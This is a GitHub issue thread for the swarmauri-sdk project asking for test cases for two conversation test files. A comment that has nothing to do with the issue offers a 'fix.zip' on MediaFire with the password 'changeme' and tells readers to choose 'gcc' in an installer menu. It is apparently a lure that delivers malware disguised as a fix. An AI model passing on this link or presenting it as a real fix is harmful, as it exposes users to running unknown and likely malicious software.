### ISSUE TITLE
[Update Test Case Configuration]: MaxSystemContextConversation_test.py and MaxSizeConversation_test.py

### ISSUE THREAD

**Issue by cobycloud** [swarmauri/swarmauri-sdk#190]
### Outdated/Incorrect Configuration Area

MaxSystemContextConversation_test.py and MaxSizeConversation_test.py

### Reason for Update

Missing test cases for BaseComponent settings, add_message, and add_messages

### Proposed Configuration Update

Create a test case file for this class

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
